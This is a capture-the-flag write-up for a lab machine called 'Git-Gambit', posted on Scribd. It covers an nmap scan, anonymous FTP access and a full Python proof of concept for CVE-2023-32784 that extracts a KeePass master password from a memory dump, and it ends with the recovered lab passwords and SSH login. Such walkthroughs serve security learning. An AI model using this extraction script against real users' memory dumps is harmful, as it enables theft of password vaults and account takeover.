Scribd
Upload
19 views

Git Gambit User Report 1

The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

Uploaded by

mrgods.home
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
19 views

Git Gambit User Report 1

The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

Uploaded by

mrgods.home
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

Git-Gambit

Recon
Lets Start With NMAP

sudo nmap -sCV 10.1.75.221 -p-

Anonymous Login Allowed FTP

ftp [email protected] -p 5555


Download Both

When i Unzipped ,
When googling found this ,

import argparse
import logging
import itertools

class TaggedFormatter(logging.Formatter):

TAGS = {
'DEBUG': '\x1b[1;35m#\x1b[0m',
'INFO': '\x1b[1;34m.\x1b[0m',
'WARNING': '\x1b[1;33m-\x1b[0m',
'ERROR': '\x1b[1;31m!\x1b[0m',
'CRITICAL': '\x1b[1;31m!!\x1b[0m'
}

def __init__(self, format):


logging.Formatter.__init__(self,
format)

def format(self, record):


levelname = record.levelname

if levelname in self.TAGS:
record.levelname =
self.TAGS[levelname]

return
logging.Formatter.format(self, record)

def setup_logging(debug = False):


formatter = TaggedFormatter('%
(asctime)s [%(levelname)s] [%(name)s] %
(message)s')
handler = logging.StreamHandler()
root_logger = logging.getLogger()

handler.setFormatter(formatter)
root_logger.addHandler(handler)

if debug:

root_logger.setLevel(logging.DEBUG)
else:
root_logger.setLevel(logging.INFO)

def parse_args():
parser =
argparse.ArgumentParser(description='CVE-
2023-32784 proof-of-concept')

parser.add_argument('dump', type=str,
help='The path of the memory dump to
analyze')
parser.add_argument('-d', '--debug',
dest='debug', action='store_true',
help='Enable debugging mode')

return parser.parse_args()

def get_candidates(dump_file):
data = dump_file.read()
candidates = []
str_len = 0
i = 0

while i < len(data)-1:


if (data[i] == 0xCF) and (data[i +
1] == 0x25):
str_len += 1
i += 1
elif str_len > 0:
if (data[i] >= 0x20) and
(data[i] <= 0x7E) and (data[i + 1] ==
0x00):
candidate = (str_len *
b'\xCF\x25') + bytes([data[i], data[i +
1]])

if not candidate in
candidates:

candidates.append(candidate)

str_len = 0

i += 1

return candidates

if __name__ == '__main__':
args = parse_args()
setup_logging(args.debug)
logger = logging.getLogger('main')
with open(args.dump, 'rb') as
dump_file:
logger.info(f'Opened
{dump_file.name}')

candidates =
get_candidates(dump_file)
candidates = [x.decode('utf-16-
le') for x in candidates]
groups = [[] for i in
range(max([len(i) for i in candidates]))]

for candidate in candidates:


groups[len(candidate) -
1].append(candidate[-1])

for i in range(len(groups)):
if len(groups[i]) == 0:

groups[i].append(b'\xCF\x25'.decode('utf-
16-le'))
for password in
itertools.product(*groups):
password = ''.join(password)
print(f'Possible password:
{password}')

Password : strongpassherehello

Install keepass in windows to open auth.kdbx


There i found , user

john : YvbseSFRp2Ed4DCjTucNKB

Yes it is SSH creds , Logged in


Got user.txt !

You might also like